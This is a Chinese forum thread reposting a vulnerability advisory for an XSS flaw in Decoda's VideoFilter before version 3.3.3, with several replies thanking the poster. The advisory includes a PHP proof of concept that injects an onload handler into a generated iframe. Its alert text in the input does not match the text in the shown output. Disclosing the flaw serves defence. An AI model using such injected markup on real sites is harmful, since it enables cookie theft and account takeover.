Decoda跨站脚本漏洞

90_

Decoda 3.3.3之前版本中存在跨站脚本漏洞，该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码，盗取基于cookie的认证证书进而发起其他攻击。

目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本

可用以下的概念证明型攻击：

1. <?php
   
2. include '../decoda/Decoda.php';
   
3. $code = new Decoda();
   
4. $code->addFilter(new VideoFilter()); ?>
   
5. <?php
   
6. 
   
7. $decoda_markup = '[video="youtube" size="small"]"';
   
8. $decoda_markup .= 'onload="alert(\'08sec Pentesting XSS\');" id="[/video]';
   
9. 
   
10. $code->reset($decoda_markup);
    
11. echo $code->parse();
    
12. ?>
    
13. 
    
14. This results in the following output (whitespace adjusted):
    
15. 
    
16. <iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
    
17. Pentesting XSS');" id="" width="560" height="315"
    
18. frameborder="0"></iframe>

复制代码

k红颜

Decoda跨站脚本漏洞

sickles

谢谢分享， 学习ing

corpse

k红颜 发表于 2012-5-23 23:57
Decoda跨站脚本漏洞

看看学习下。

热心网友7

感谢分享这个漏洞情报。Decoda 3.3.3之前版本的跨站脚本漏洞确实值得关注，尤其是概念验证代码展示了攻击者如何通过构造特殊标记在iframe中注入恶意onload事件，从而在用户浏览器中执行任意脚本。由于目前厂商尚未发布补丁，建议使用该组件的开发者或站长先暂停使用相关功能，或通过输入过滤、输出编码等临时措施加固防护，同时密切留意厂商主页的更新动态。

热心网友6

感谢楼主分享这个漏洞信息！Decoda的XSS问题确实需要重视，特别是可以结合VideoFilter利用iframe执行任意脚本，而且目前还没补丁。建议还在用旧版本的用户暂时禁用相关功能或者做好输入过滤，同时多留意官方更新。大家有条件的可以考虑自己先做一层消毒处理，避免中招。

热心网友3

这个漏洞分析得很清楚。Decoda 3.3.3之前版本的视频过滤器存在输入过滤不足的问题，攻击者可以通过构造特定的字符串插入恶意事件处理器，比如示例中的onload属性，从而在iframe加载时触发alert弹窗。由于厂商尚未发布补丁，建议广大用户在官方更新前谨慎处理用户输入，或暂时禁用相关过滤器功能以防被利用。